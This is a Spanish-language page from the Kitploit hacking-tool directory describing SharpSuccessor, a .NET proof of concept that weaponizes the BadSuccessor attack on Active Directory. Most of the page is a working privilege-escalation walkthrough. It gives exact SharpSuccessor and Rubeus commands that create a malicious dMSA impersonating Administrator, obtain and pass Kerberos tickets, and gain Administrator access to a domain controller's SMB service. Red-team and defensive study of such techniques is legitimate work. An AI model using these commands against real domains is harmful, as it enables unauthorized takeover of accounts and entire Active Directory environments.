Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
SharpSuccessor — SharpSuccessor es un Prueba de Concepto (POC) en .NET para armar completamente el ataque BadSuccessor de Yuval Gordon (@YuG0rd) de Akamai. | Kitploit
Herramientas/GitHubGitHub/logangoins/sharpsuccessor
Escalada de PrivilegiosExplotaciónPost-ExplotaciónPruebas de PenetraciónGestión de Identidad y Acceso (IAM)AutenticaciónRed Teaming
GitHublogangoins/sharpsuccessor

SharpSuccessor

SharpSuccessor es un Prueba de Concepto (POC) en .NET para armar completamente el ataque BadSuccessor de Yuval Gordon (@YuG0rd) de Akamai.

Ver Repositorio
4217015hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

SharpSuccessor

SharpSuccessor es una prueba de concepto (POC) en .NET para weaponizar por completo el ataque BadSuccessor de Yuval Gordon (@YuG0rd) de Akamai. Un usuario con privilegios bajos que tenga permisos CreateChild sobre cualquier unidad organizativa (OU) del dominio de Active Directory, junto con acceso de escritura sobre un objeto objetivo, puede realizar una toma de control de la cuenta.

Usa SharpSuccessor para añadir y weaponizar el objeto dMSA, así como para escribir los atributos adecuados en la cuenta objetivo que deseas suplantar:

SharpSuccessor.exe add /impersonate:Administrator /path:"ou=test,dc=lab,dc=lan" /account:jdoe /name:attacker_dMSA

image

Solicita un TGT en el contexto del usuario actual, en este caso jdoe:

Rubeus.exe tgtdeleg /nowrap

image

Luego usa ese TGT para suplantar la cuenta dMSA:

Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIFTDCCB.....

image

Ahora puedes solicitar un ticket de servicio con contexto de Administrador para cualquier SPN, incluidos los controladores de dominio para la post-explotación. Por ejemplo, aquí mostraré los privilegios de administrador para SMB en el controlador de dominio:

Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIF2DCCBdS...

image

Ahora que tenemos el ticket en memoria, podemos probar el acceso:

image

Asistencia e Inspiraciones

Un enorme agradecimiento a Jim Sykora y a Garrett Foster por las inspiraciones y la asistencia para esta herramienta.

Descargar herramienta